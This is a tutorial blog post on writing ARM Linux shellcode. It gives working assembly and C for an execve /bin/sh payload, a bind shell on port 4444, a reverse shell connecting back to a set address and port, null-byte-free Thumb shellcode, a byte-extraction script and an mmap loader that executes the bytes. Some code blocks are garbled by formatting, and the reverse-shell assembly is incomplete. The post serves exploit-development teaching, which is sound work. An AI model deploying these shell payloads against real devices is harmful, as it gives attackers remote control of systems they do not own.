8. Introduction to Shellcoding

Posted Jul 4, 2025

By nyxfault

21 min read

Shellcode

Shellcode is a small piece of code used as the payload in an exploitation process. It typically executes a predefined set of actions within the context of a vulnerable application, often allowing attackers to gain control of a system or execute commands.

The name “shellcode” originates from the fact that early versions of shellcode were designed to spawn a shell (a command-line interface) for the attacker, giving them access to execute arbitrary commands on the compromised machine.

ARM Architecture Specifics for Exploitation

Register Set: ARM uses a rich set of registers (R0-R15, including special registers like CPSR) that allow shellcode to interact with the system and exploit vulnerabilities.
Processor Modes: ARM features various modes like User Mode, Supervisor Mode, and Interrupt Mode that can be leveraged for gaining higher privilege levels.
ARM’s Pipelined Execution: ARM processors execute instructions efficiently using pipelines, which can be exploited to gain precise control of execution flow.
Memory Management: ARM’s Memory Management Unit (MMU) and the architecture’s support for various addressing modes (e.g., pre-indexing, post-indexing) make it easier to craft shellcode that interacts directly with memory.
System Calls: ARM has specific system call conventions, and understanding these conventions (e.g., using SWI for software interrupts) is essential for shellcode creation.

Call convention by architechture

ARCH	NR	RETURN	ARG0	ARG1	ARG2	ARG3	ARG4	ARG5
arm	r7	r0	r0	r1	r2	r3	r4	r5
arm64	x8	x0	x0	x1	x2	x3	x4	x5
x86	eax	eax	ebx	ecx	edx	esi	edi	ebp
x64	rax	rax	rdi	rsi	rdx	r10	r8	r9

ARM’s Popularity in Embedded Systems

Many IoT devices and routers use ARM processors, making them prime targets for exploitation.
ARM processors are also commonly found in mobile phones, especially those running Android, and even smart TVs and automotive systems.

Hello World Shellcode

For ARM architecture, we can use the write system call to print the string to the console and then use the exit system call to terminate the program.

  
.section .text
.global _start
_start:
    // Step 1: sys_write (write message to stdout)
    mov r0, #1                // File descriptor 1 (stdout)
    ldr r1, =msg              // Address of the string to print
    ldr r2, =len              // Load the length of the message into r2
    mov r7, #4                // System call number for sys_write (4)
    swi 0                     // Trigger the system call

    // Step 2: sys_exit (exit the program)
    mov R0, #0                // Exit status (0 for success)
    mov R7, #1                // System call number for sys_exit (1)
    swi 0                     // Trigger the system call

.section .data
msg:
	.asciz "Hello, World!"    // Define the message Null Terminated string
len = . - msg                  // Calculate the length of the string

Execve Shellcode (Execute Command)

An execve shellcode allows the attacker to execute arbitrary commands on the compromised machine. The shellcode mimics the system call execve, which is used to launch processes in Unix-like systems.

How It Works: The shellcode places the path to an executable (such as /bin/sh for a shell) into memory and invokes the execve system call to run it.
Use Case: Useful for attackers who want to run specific commands or execute a shell from within an exploited program.

```s title:execve.s .section .text .global _start

_start: // Prepare arguments for execve ldr r0, =shell // Pointer to the string “/bin/sh” mov r1, #0 // argv (NULL) mov r2, #0 // envp (NULL) mov r7, #11 // syscall number for execve svc #0 // make the syscall

.section .data shell: .asciz “/bin/sh” // Null-terminated string for execve

### Shellcode Extraction

Use the following script to extract shellcode:

```python title:shellcode_extractor.py
import sys
import re
import argparse

def error():
    print("\nError! \nUsage: objdump -d example.o | python shellcode_extractor.py [-s]")

def save_shellcode(shellcode):
    with open("payload.bin", "wb") as f:
        byte_data = bytes.fromhex(shellcode.replace("\\x", ""))
        f.write(byte_data)
    print("\nShellcode saved to payload.bin")

def main():
    # Initialize argparse to handle command-line arguments
    parser = argparse.ArgumentParser(description="Extract and optionally save shellcode from objdump output")
    parser.add_argument("-s", "--save", action="store_true", help="Save the extracted shellcode to payload.bin")
    
    args = parser.parse_args()

    if not sys.stdin.isatty():
        try:
            shellcode = ""
            length = 0
            while True:
                item = sys.stdin.readline()
                if item:
                    if re.match("^[ ]*[0-9a-f]*:.*$", item):
                        item = item.split(":")[1].lstrip()
                        x = item.split("\t")
                        opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
                        for i in opcode:
                            shellcode += "\\x" + i
                            length += 1
                else:
                    break

            if shellcode == "":
                print("Nothing to extract")
            else:
                print("\nShellcode Extracted: ")
                print(shellcode)
                print("\nLength: " + str(length) + "\n")

                # If the save flag is provided, save the shellcode to a file
                if args.save:
                    save_shellcode(shellcode)

        except:
            error()
            pass
    else:
        error()

if __name__ == "__main__":
    main()

arm-linux-gnueabihf-objdump -d example.o | python shellcode_extractor.py

:LiNotebookPen:

  
as -o shellcode.o shellcode.s
ld -o shellcode shellcode.o
objcopy -O binary --only-section=.text shellcode shellcode.bin

Bind Shell

A bind shell is a shellcode that opens a network socket on the target machine, waits for incoming connections, and provides a shell once a connection is made. The attacker can connect to the target machine on the specified port to gain control.

How It Works: The shellcode binds a port on the target machine, listens for incoming network connections, and once a connection is established, it transfers the input and output to the attacker’s session.
Use Case: This type of shellcode is typically used when an attacker wants to directly access the target machine through a known network port.

```s title:bind.s .section .text .global _start

_start: // ========== SOCKET CREATION ========== // socket(AF_INET, SOCK_STREAM, 0) mov r0, #2 // AF_INET = 2 mov r1, #1 // SOCK_STREAM = 1 mov r2, #0 // Protocol = 0 (IP) mov r7, #281 // socket syscall number svc #0 // Check for errors (r0 = -1 if error) cmp r0, #0 ble error mov r4, r0 // Save socket fd in r4

// ========== BIND SOCKET ==========
// bind(sockfd, &sockaddr, 16)
adr r1, sockaddr // Pointer to sockaddr structure
mov r2, #16      // sizeof(sockaddr) = 16
mov r0, r4       // socket fd
mov r7, #282     // bind syscall number
svc #0
// Check for errors
cmp r0, #0
blt error

// ========== LISTEN ==========
// listen(sockfd, 1)
mov r0, r4      // socket fd
mov r1, #1      // backlog = 1
mov r7, #284    // listen syscall number
svc #0
// Check for errors
cmp r0, #0
blt error

// ========== ACCEPT CONNECTION ==========
// accept(sockfd, NULL, NULL)
mov r0, r4      // socket fd
mov r1, #0      // NULL sockaddr
mov r2, #0      // NULL addrlen
mov r7, #285    // accept syscall number
svc #0
// Check for errors
cmp r0, #0
blt error
mov r5, r0      // Save client fd in r5

// ========== REDIRECT STDIN/OUT/ERR ==========
// dup2(clientfd, 0)
mov r0, r5      // client fd
mov r1, #0      // STDIN
mov r7, #63     // dup2 syscall
svc #0

// dup2(clientfd, 1)
mov r0, r5      // client fd
mov r1, #1      // STDOUT
svc #0

// dup2(clientfd, 2)
mov r0, r5      // client fd
mov r1, #2      // STDERR
svc #0

// ========== EXECUTE SHELL ==========
// execve("/bin/sh", NULL, NULL)
adr r0, shell   // Pointer to "/bin/sh"
mov r1, #0      // NULL argv
mov r2, #0      // NULL envp
mov r7, #11     // execve syscall
svc #0

error: // Simple error handling - just exit mov r7, #1 // exit syscall svc #0

// Data Section sockaddr: .short 0x2 // AF_INET = 2 .short 0x5c11 // Port 4444 (0x115c in network byte order) .word 0x0 // INADDR_ANY = 0 (0.0.0.0)

shell: .asciz “/bin/sh” // Null-terminated string

A bind shell:

1. Creates a network socket
2. Binds to a specific port
3. Listens for incoming connections
4. When someone connects, it redirects standard I/O to the socket
5. Spawns a shell, giving the remote user control

Key ARM registers we'll use:

- `r0-r3`: Argument/scratch registers (for syscall parameters)
- `r7`: Holds the syscall number
- `pc`: Program counter (like EIP in x86)

#### A. Create a Socket

```c
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>

int main() {
    // Create socket
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket creation failed");
        exit(EXIT_FAILURE);
    }

  
// Create socket
// int sockfd = socket(AF_INET, SOCK_STREAM, 0);
mov r0, #2      // AF_INET (IPv4)
mov r1, #1      // SOCK_STREAM (TCP)
mov r2, #0      // Protocol (0 for IP)
mov r7, #281    // socket syscall number (may vary by OS)
svc #0          // Execute syscall
mov r4, r0      // Save returned socket file descriptor in r4

B. Bind the Socket

  
    // Bind socket
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(4444);  // 0x5c11 in assembly
    addr.sin_addr.s_addr = INADDR_ANY;  // 0.0.0.0
    
    if (bind(sockfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
        perror("bind failed");
        close(sockfd);
        exit(EXIT_FAILURE);
    }

  
adr r1, sockaddr
mov r2, #16
mov r0, r4
mov r7, #282     // bind syscall
svc #0

sockaddr structure in assembly matches struct sockaddr_in
htons(4444) converts port to network byte order (0x5c11)
sizeof(addr) = 16 bytes (same as mov r2, #16)

C. Listen for Connections

  
    // Listen
    if (listen(sockfd, 1) < 0) {  // backlog=1
        perror("listen failed");
        close(sockfd);
        exit(EXIT_FAILURE);
    }

  
mov r0, r4      // socket fd
mov r1, #1      // backlog
mov r7, #284    // listen syscall
svc #0

Same socket fd passed in r0/first argument
Backlog of 1 connection (mov r1, #1)

D. Accept Connection

  
    // Accept connection
    int clientfd = accept(sockfd, NULL, NULL);
    if (clientfd < 0) {
        perror("accept failed");
        close(sockfd);
        exit(EXIT_FAILURE);
    }

  
mov r0, r4      // socket fd
mov r1, #0      // NULL sockaddr
mov r2, #0      // NULL addrlen
mov r7, #285    // accept syscall
svc #0
mov r5, r0      // save client fd

NULL, NULL equivalent to mov r1, #0, mov r2, #0
Returned fd stored in r5/clientfd

E. Duplicate File Descriptors

  
    // Redirect stdin/stdout/stderr to socket
    dup2(clientfd, 0);  // STDIN
    dup2(clientfd, 1);  // STDOUT
    dup2(clientfd, 2);  // STDERR
    
    // Close original client fd (not strictly needed)
    close(clientfd);

  
// STDIN (0)
mov r0, r5      // client fd
mov r1, #0
mov r7, #63     // dup2
svc #0

// STDOUT (1)
mov r0, r5
mov r1, #1
svc #0

// STDERR (2)
mov r0, r5
mov r1, #2
svc #0

Three dup2 calls for each standard file descriptor
Same syscall number (63) called three times with different args

F. Execute Shell

  
    // Execute shell
    char *args[] = {NULL};
    char *env[] = {NULL};
    
    execve("/bin/sh", args, env);
    
    // Only reaches here if execve fails
    perror("execve failed");
    close(sockfd);
    exit(EXIT_FAILURE);
}

  
adr r0, shell   // "/bin/sh"
mov r1, #0      // NULL argv
mov r2, #0      // NULL envp
mov r7, #11     // execve
svc #0

shell:
    .asciz "/bin/sh"

Bind Shell in C

```c title:bind_shell.c #include #include #include #include <sys/socket.h> #include <netinet/in.h>

int main() { // 1. Create socket int sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) { perror(“socket failed”); exit(EXIT_FAILURE); }

// 2. Bind socket
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444); // Port 4444
addr.sin_addr.s_addr = INADDR_ANY; // 0.0.0.0

if (bind(sockfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
    perror("bind failed");
    close(sockfd);
    exit(EXIT_FAILURE);
}

// 3. Listen
if (listen(sockfd, 1) < 0) {
    perror("listen failed");
    close(sockfd);
    exit(EXIT_FAILURE);
}

// 4. Accept connection
int clientfd = accept(sockfd, NULL, NULL);
if (clientfd < 0) {
    perror("accept failed");
    close(sockfd);
    exit(EXIT_FAILURE);
}

// 5. Duplicate file descriptors
dup2(clientfd, 0); // STDIN
dup2(clientfd, 1); // STDOUT
dup2(clientfd, 2); // STDERR
close(clientfd);

// 6. Execute shell
char *args[] = {NULL};
char *env[] = {NULL};
execve("/bin/sh", args, env);

// Only reached if execve fails
perror("execve failed");
close(sockfd);
return EXIT_FAILURE; } ```

Reverse Shell

A reverse shell is a shellcode that causes the compromised machine to connect back to the attacker’s system, allowing them to execute commands remotely. This type of shellcode is often used in situations where the attacker cannot directly access the compromised machine (e.g., because it is behind a firewall or NAT).

How It Works: The shellcode will open a network socket, connect to the attacker’s machine, and redirect input/output to the attacker’s system. Once connected, the attacker can execute commands on the victim system.
Use Case: This is commonly used in penetration testing and malicious activity, where an attacker needs to remotely control a device after gaining initial access.

A reverse shell:

Creates a network socket
Connects to a specified remote IP and port
Redirects standard I/O to the socket
Spawns a shell, giving the remote user control

```s title:reverse.s .section .text .global _start

// ========== CONNECT TO REMOTE ==========
// connect(sockfd, &sockaddr, 16)
adr r1, sockaddr // Pointer to sockaddr structure
mov r2, #16      // sizeof(sockaddr) = 16
mov r0, r4       // socket fd
mov r7, #283     // connect syscall number
svc #0

// ========== DUP2 STDIN/OUT/ERR ==========
// dup2(clientfd, 0)
mov r0, r4      // socket fd
mov r1, #0      // STDIN
mov r7, #63     // dup2 syscall
svc #0

// dup2(clientfd, 1)
mov r0, r4
mov r1, #1      // STDOUT
svc #0

// dup2(clientfd, 2)
mov r0, r4
mov r1, #2      // STDERR
svc #0

// ========== EXECUTE SHELL ==========
// execve("/bin/sh", NULL, NULL)
adr r0, shell   // Pointer to "/bin/sh"
mov r1, #0      // NULL argv
mov r2, #0      // NULL envp
mov r7, #11     // execve syscall
svc #0

sockaddr: .short 0x2 // AF_INET = 2 .short 0x901F // Port 8080 (0x1F90 in network

*Reverse Shell in C*

```c title:reverse_shell.c
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main() {
    // 1. Create socket
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    
    // 2. Connect to remote
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(8080);          // Port 8080
    addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // IP
    
    connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    
    // 3. Duplicate file descriptors
    dup2(sockfd, 0); // STDIN
    dup2(sockfd, 1); // STDOUT
    dup2(sockfd, 2); // STDERR
    
    // 4. Execute shell
    char *args[] = {NULL};
    execve("/bin/sh", args, NULL);
    
    return 0;
}

But now if you extract shellcode you will find NULL bytes. Let’s remove them.

Null-Free ARM `execve("/bin/sh")` Shellcode

Null bytes (0x00) often terminate strings in exploits, so shellcode containing them might get truncated. We need to:

Avoid literal nulls in instructions
Avoid nulls in data (like strings)
Use register manipulation to create needed zeros

```s title:nullfree_execve.s .section .text .global _start

_start: .ARM add r3, pc, #1 // 1. Set up Thumb mode switch bx r3 // 2. Switch to Thumb mode

    .THUMB
    add r0, pc, #8      // 3. Get address of "/bin/dash"
    sub r1, r1, r1      // 4. Zero out r1 (argv)
    mov r2, r1          // 5. Zero out r2 (envp)
    strb r2, [r0, #9]   // 6. Null-terminate the string
    mov r7, #11         // 7. Set execve syscall number
    svc #1              // 8. Execute syscall

.ascii “/bin/dashY” // 9. The command string

It's not strictly **compulsory** to use `.ARM` and `.THUMB` directives in your assembly code, but they serve important purposes and make your intentions clearer.

If your code has **both ARM and Thumb sections**, directives help the assembler:
- Generate correct opcodes (32-bit vs 16-bit).
- Avoid misaligned instructions.

**Test with a C loader:**

```c title:loader.c
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>

int main() {
    /* unsigned char code[] = {
        0x08,0x00,0x8f,0xe2,0x01,0x10,0x21,0xe0,
        0x02,0x20,0x22,0xe0,0x0b,0x70,0xa0,0xe3,
        0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x58
    }; */

    unsigned char shellcode[] =   "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\x42\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x59\xc0\x46";

    void *mem = mmap(NULL, sizeof(shellcode), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    memcpy(mem, shellcode, sizeof(shellcode));
    // ((void (*)(void))mem)();
    int (*ret)() = (int(*)())mem;
    ret();
    
    return 0;
}

To install libc of armhf

sudo apt install libc6-armhf-cross

While debugging you may face SIGSEGV (segmentation fault) at the strb instruction occurs when you try to write to a read-only memory location.

Root Cause Analysis

Memory Protection:
- When loaded normally (via C loader), your shellcode is in writable memory
- When debugged via QEMU/GDB, it’s loaded into read-only code segments
- The strb tries to modify the string in place (to null-terminate it)
Address Calculation:
- r0 contains 0x10068 (address of “/bin/dashY”)
- strb r2, [r0, #9] tries to write to 0x10071
- This address is in a read-only code section
Key Difference:
- C loader uses mmap with PROT_WRITE
- QEMU loads the binary with standard ELF permissions

You can try using set write on command in GDB.

Why you don’t get SIGSEGV in C Loader

Your C loader uses:

  
void *mem = mmap(NULL, sizeof(code), PROT_READ|PROT_WRITE|PROT_EXEC, ...);

This makes the memory both writable and executable, while QEMU loads with standard ELF permissions where .text is read-only by default.

In GDB, Test write capability:

  
set *(char *)0x10071 = 0x0

`bx r3` Instruction

bx = Branch with Exchange
When you branch to an address with LSB (Least Significant Bit) = 1:
- Processor switches to Thumb mode (16-bit instructions)
- The actual target address = (r3 & ~1) (clears the LSB)
When LSB = 0:
- Stays in ARM mode (32-bit instructions)

Why `add r3, pc, #1`?

pc (Program Counter) is always 2 instructions ahead in ARM state
Current PC = _start + 8 (ARM pipeline effect)
Adding 1 makes the address odd (LSB=1) for Thumb mode
Final address = (_start + 8) + 1 = _start + 9 (with LSB=1)

Now, the main question arises why bx r3 doesn’t start at _start + 9.

When at _start (address 0x10000):
- add r3, pc, #1 is at 0x10000
- PC value during execution = 0x10008
- So r3 = 0x10008 + 1 = 0x10009 (LSB=1 indicates Thumb mode)
bx r3 does:
1. Clears LSB: 0x10009 → 0x10008
2. Switches to Thumb mode (because original LSB was 1)
3. Branches to 0x10008

:LiNotebookPen: The +1 is only for setting Thumb mode (LSB=1), not for address calculation. Actual branch target is always even (LSB cleared)

In ARM mode, instructions are typically 32 bits long. In Thumb mode, instructions are primarily 16 bits long. Thumb code can be approximately 30% smaller than equivalent ARM code, but it may also result in longer execution times due to the increased number of instructions executed

In ARM Mode, the Program Counter (PC) points to the address of the current instruction plus 8 bytes (2 instructions ahead). In Thumb Mode, the PC is 4 bytes ahead of the current instruction address (2 instructions ahead).

If your code depends on instruction alignment (e.g., using .align 4), directives ensure the assembler doesn’t pad incorrectly.

The Function Pointer Line: `((void (*)(void))mem)();`

This line does one main thing:
It takes a chunk of memory containing your shellcode and runs it like a normal function.

C normally doesn’t let you execute random memory. So you:

Create a “function costume” for your memory

  
// This is the "costume" declaration:
void (*)()  
// Translation: "a pointer to a function that returns nothing"

Dress up your memory in this costume

  
(void (*)())mem
// Now `mem` is "wearing a function costume"

Call it like a function

  
( (void (*)())mem )(); 
// Same as: "take mem (dressed as a function), then call it"

This is how you manually run machine code in C when you have the bytes in memory. It’s like telling your computer:
“See these bytes? Actually run them as instructions now.”

The Function Pointer Declaration

  
int (ret*)()

ret is a pointer to a function
That function returns an int (the return type doesn’t really matter for shellcode)
That function takes no arguments (empty parentheses)

The Cast

  
(int(*)())mem

Takes your mem pointer (which points to raw shellcode bytes)
Casts it to “pointer to function returning int”
The (*)() is the syntax for “function pointer”

The Execution

ret();

🎩 THE SHELLCODE ILLUSION - A MAGICIAN’S GUIDE 🎩

1. THE PLEDGE: “We Show You Something Ordinary”

“Here is a simple piece of memory,” you say, holding up a plain buffer:

  
unsigned char shellcode[] = {0x01, 0x30, 0x8f, 0xe2, ...};  
void *mem = mmap(..., PROT_EXEC, ...);  
memcpy(mem, shellcode, ...);  

“Just bytes. Harmless. Unremarkable.”

2. THE TURN: “We Make It Disappear”

“Now, watch closely as we transform these bytes… into something extraordinary.”

  
int (*ret)() = (int(*)())mem;  

With a flick of the compiler’s wrist:

The bytes vanish as “data”…
Reappear as a function—an executable spell!

“You’re not looking at memory anymore. You’re looking at code.”

3. THE PRESTIGE: “The Final Reveal”

“But the true magic… is in the execution.”

ret();  

POOF!

The shellcode comes alive, the CPU obeys, and—
“You’re left with a shell!”

“The secret impresses no one. The execution is everything.”

BEWARE THE TRAPDOOR

Like all magic:

Dangerous if mishandled (malicious shellcode = a trick that backfires).
The crowd (CPU) must be willing (PROT_EXEC = “Yes, you may perform this illusion”).

Programming, ARM Assembly

ARM shellcoding

This post is licensed under CC BY 4.0 by the author.